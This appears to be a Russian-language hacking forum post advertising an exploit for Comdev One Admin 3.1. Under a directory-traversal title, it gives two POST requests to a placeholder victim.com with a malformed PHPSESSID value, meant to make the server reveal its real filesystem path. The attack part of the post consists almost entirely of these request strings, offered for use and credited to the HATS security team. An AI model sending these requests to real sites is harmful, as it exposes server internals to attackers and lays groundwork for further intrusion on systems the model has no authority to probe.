• XSS.stack #1 – первый литературный журнал от юзеров форума

Web Обратный путь в каталогах в Comdev One Admin 3.1

Ŧ1LAN

CPU register
Пользователь
Регистрация
19.12.2005
Сообщения
1 057
Решения
1
Реакции
6
Обратный путь в каталогах в Comdev One Admin 3.1
Пример/эксплоит:
Возможно получение реального пути к веб-серверу с помощью запроса:
1.
Код:
http://victim.com/index.php 
POST PHPSESSID='&pageaction=1&username=1&password=1 HTTP/1.1

2.
Код:
http://victim.com/index.php?component=common&page=wce.forget.php 
POST PHPSESSID='&pageaction=1&username=1&email=test@test.ru HTTP/1.1
Источник: HATS security team
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх